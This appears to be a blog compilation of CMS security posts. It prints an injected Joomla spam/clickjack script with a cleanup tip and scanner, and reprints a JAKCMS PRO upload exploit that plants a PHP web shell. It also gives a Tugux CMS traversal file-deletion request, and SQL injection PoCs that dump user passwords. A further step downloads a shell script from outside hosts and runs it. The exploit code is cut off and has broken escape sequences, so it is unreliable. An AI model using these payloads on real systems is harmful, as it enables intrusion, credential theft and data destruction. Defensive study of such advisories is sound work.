dnnViewState SPAM on Joomla: how to solve it


It is common to see older versions of the Joomla CMS being trolled by a flood of web bots. Among the filthiest defacements in circulation today are exactly these 2 (AVAST calls it CLICKJACK-A - TROJAN):

 

<script type="text/javascript" language="JavaScript">// <![CDATA[
function xViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}xViewState();
// ]]></script>

These usually go by the names xVIEWSTATE or DNNVIEWSTATE. The way out for xViewState and dnnViewState is to locate those terms in the Joomla files. One file in particular is commonly attacked: modules/mod_AutsonSlideShow/tmpl/default.php. Remove the function above (JavaScript) from it and the problem will be solved!
Legend has it that WordPress suffers from this too.
To sweep your code, use Dreamweaver or any IDE (or even the terminal) that can search every file for a specific term (look for dnnView or xView) and you are done!

Cheers!
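The search described above can be scripted. This added example (not part of the original post) walks a site tree for the xViewState/dnnViewState markers and statically decodes the numeric array that follows them, without executing the script. The file extensions, the mod_example path and the demo tree are constructed assumptions; the array is the one quoted in this post.

```python
import os
import re
import tempfile

MARKER = re.compile(r"(?:dnn|x)ViewState", re.IGNORECASE)
ARRAY = re.compile(r"new Array\(([^)]*)\)")
# Array exactly as quoted in this post.
PAGE_ARRAY = ("new Array('9091968376',"
              "'8887918192818786347374918784939277359287883421333333338896',"
              "'877886888787','949990793917947998942577939317')")

def decode_array(strings):
    """Replay the injected loop statically: in element i, every two-digit
    pair p becomes chr(p + 25 - i) (the script's parseInt(t)+25-l+a)."""
    return ["".join(chr(int(s[k:k + 2]) + 25 - i)
                    for k in range(0, len(s) - 1, 2))
            for i, s in enumerate(strings)]

def scan(root, exts=(".php", ".html", ".htm", ".js")):
    """Return [(relative path, decoded strings)] for files with a marker."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            found = MARKER.search(text)
            if not found:
                continue
            arr = ARRAY.search(text, found.start())
            decoded = decode_array(re.findall(r"\d+", arr.group(1))) if arr else []
            hits.append((os.path.relpath(path, root), decoded))
    return sorted(hits)

def demo():
    """Constructed tree: one infected template, one clean file."""
    with tempfile.TemporaryDirectory() as root:
        tmpl = os.path.join(root, "modules", "mod_example", "tmpl")
        os.makedirs(tmpl)
        with open(os.path.join(tmpl, "default.php"), "w") as fh:
            fh.write("<script>function xViewState(){var x=%s;}</script>" % PAGE_ARRAY)
        with open(os.path.join(tmpl, "clean.php"), "w") as fh:
            fh.write("<?php echo 'ok'; ?>")
        return scan(root)

if __name__ == "__main__":
    for path, decoded in demo():
        print(path, decoded)
```

For the array above the decoded strings are style, position:absolute;top:-9999px, nemonn and type='text/css': the script writes a CSS rule that pushes elements of class nemonn off-screen, so that class name is worth searching for as well.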

JAKCMS PRO



# Exploit Title: JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit
# Google Dork: "Powered By JAKCMS"
# Date: 21/09/2011
# Author: EgiX
# Software Link: http://www.jakcms.com/
# Version: 2.2.5
# Tested on: Windows 7 and Debian 6.0.2
n";

print "nExample....: php $argv[0] localhost /";

print "nExample....: php $argv[0] localhost /jakcms/n";

die();

}

$host = $argv[1];

$path = $argv[2];

$packet = "GET {$path} HTTP/1.0rn";

$packet .= "Host: {$host}rn";

$packet .= "Connection: closernrn";

preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m);

$sid = $m[1];

$payload = "--o0oOo0orn";

$payload .= "Content-Disposition: form-data; name="edit1"rnrn.phprn";

$payload .= "--o0oOo0orn";

$payload .= "Content-Disposition: form-data; name="input1"; filename="foo"rnrn";

$payload .= "< ?php ${error_reporting(0)}.${print(_code_)}.${passthru(base64_decode($_SERVER[HTTP_CMD]))} ?>rn";

$payload .= "--o0oOo0o--rn";

$get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh"));

$packet = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0rn";

$packet .= "Host: {$host}rn";

$packet .= "Cookie: PHPSESSID={$sid}rn";

$packet .= "Content-Length: ".strlen($payload)."rn";

$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0orn";

$packet .= "Connection: closernrn";

$packet .= $payload;

if (preg_match("/Error/", http_send($host, $packet))) die("n[-] Upload failed!n");

$packet = "GET {$path}cache/sh.php HTTP/1.0rn";

$packet .= "Host: {$host}rn";

$packet .= "Cmd: %srn";

$packet .= "Connection: closernrn";

while(1)

{

print "njakcms-shell# ";

if (($cmd = trim(fgets(STDIN))) == "exit") break;

preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("n[-] Exploit failed!n");

}

?>

Source: http://www.exploit-db.com/exploits/17882/

How to check CMS versions quickly and practically


To run the check, download the following tool from one of the two addresses below:

root@appunix:~# wget http://server.cmsversion.com/checktest.sh

or

root@appunix:~# wget http://www.libphp.net/checktest.sh

Then do the following:

root@appunix:~# chmod +x checktest.sh

root@appunix:~# ./checktest.sh -u logindeumacontanomeuserver

The output should look like this:

Latest Joomla: 1.5.23
Installed Version: 1.5.20
Installed Location: /home/logindeumacontanomeuserver/public_html/pathdocms/

This tip works for Joomla, WordPress, WHMCS, etc.

Tugux CMS 1.2 (pid) Arbitrary File Deletion Vulnerability



Tugux CMS 1.2 (pid) Remote Arbitrary File Deletion Vulnerability

Vendor: Tugux Studios
Product web page: http://www.tugux.com
Affected version: 1.2

Summary: Tugux CMS is a free, open-source content Management system
(CMS) and application that powers the entire web.

Desc: Input passed to the 'pid' parameter in administrator/delete_page_parse.php
is not properly sanitised before being used to delete files. This can be exploited
to delete files with the permissions of the web server via directory traversal
sequences passed within the 'pid' parameter.

------------------------------------------------------------------------------
/administrator/delete_page_parse.php:
------------------------------------------------------------------------------

1:

15:
16: Operation completed.Your page has been DELETED.
17: Click Here to go back

';
18: exit();
19: ?>

------------------------------------------------------------------------------

Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab

Advisory ID: ZSL-2011-5024
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5024.php

02.04.2011

--

POST /tugux/administrator/delete_page_parse.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 175
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="pid"

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../boot.ini
------x--

Source:
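The mitigation that the advisory's description points to, as an added example that is not code from Tugux CMS or from the advisory: resolve the requested name and refuse anything that lands outside the directory holding the pages. It is written in Python for illustration; the directory layout, file names and function names are assumptions, and how Tugux actually maps 'pid' to a file is not shown on this page.

```python
import os
import tempfile

def naive_target(pages_dir, pid):
    """Vulnerable pattern (assumed): pid is joined to the directory as-is."""
    return os.path.normpath(os.path.join(pages_dir, pid))

def safe_target(pages_dir, pid):
    """Return the real path to delete, or None when pid leaves pages_dir."""
    base = os.path.realpath(pages_dir)
    candidate = os.path.realpath(os.path.join(base, pid))
    # commonpath() compares whole components, so a sibling such as
    # "pages_old" is not accepted as being inside "pages".
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate if os.path.isfile(candidate) else None

def delete_page(pages_dir, pid):
    """Delete only files that resolve inside pages_dir; report success."""
    target = safe_target(pages_dir, pid)
    if target is None:
        return False
    os.remove(target)
    return True

def demo():
    """Constructed layout: pages/about.php plus a file outside pages/."""
    with tempfile.TemporaryDirectory() as root:
        pages = os.path.join(root, "pages")
        os.makedirs(pages)
        outside = os.path.join(root, "boot.ini")
        page = os.path.join(pages, "about.php")
        for p in (outside, page):
            open(p, "w").close()
        payload = "../boot.ini"  # shortened form of the advisory's pid value
        return {
            "naive_resolves_outside": naive_target(pages, payload) == outside,
            "traversal_rejected": not delete_page(pages, payload),
            "absolute_rejected": not delete_page(pages, outside),
            "outside_file_kept": os.path.exists(outside),
            "page_deleted": delete_page(pages, "about.php") and not os.path.exists(page),
        }

if __name__ == "__main__":
    print(demo())
```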

phpDealerLocator Multiple SQL Injection Vulnerabilities


# Exploit Title: phpDealerLocator - Multiple SQL Injection vulnerabilities
# Date: 7/3/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: phpdealerlocator.yourphppro.com
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters:

record.php?Dealer_ID=
record_country.php?Dealer_ID=
results_latlong.php?s_Latitude=
results_latlong.php?s_Longitude=
results_latlong.php?s_Dealer_Radius=
results_phone.php?s_Dealer_Radius=
results_radius.php?s_Dealer_Radius=

##############################################################
PoC:

http://www.example.com/Locator/record.php?Dealer_ID=00000026 union all select 1,2,3,4,5,group_concat(Users_Name,0x3a,Users_Password,0x0a),7,8 FROM users--

##############################################################
www.websiteauditing.org
www.areyousecure.net

# Shouts to the Belegit crew

Source: http://www.exploit-db.com/exploits/17477/

PhpFood CMS v2.00 SQL Injection Vulnerability


#############################################################################################################
## PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability ##
## Author : kaMtiEz (kamtiez@exploit-id.com) ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ##
## Date : 3 July, 2011 ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.phpfood.com/
[+] Download : http://www.phpfood.com/download.html
[+] version : 2.00 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num] and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

[ See It ]

Duplicate entry '5.0.91-community1' for key 1 :D

[ FIX ]

dunno :">

#############################################################################################################

[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0, and all the friends I cannot mention one by one :D

[ NOTE ]

[+] Stop Dreaming , Lets Do it !
[+] Don't be afraid, wounds will surely heal :)

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..

Source: http://www.exploit-db.com/exploits/17485/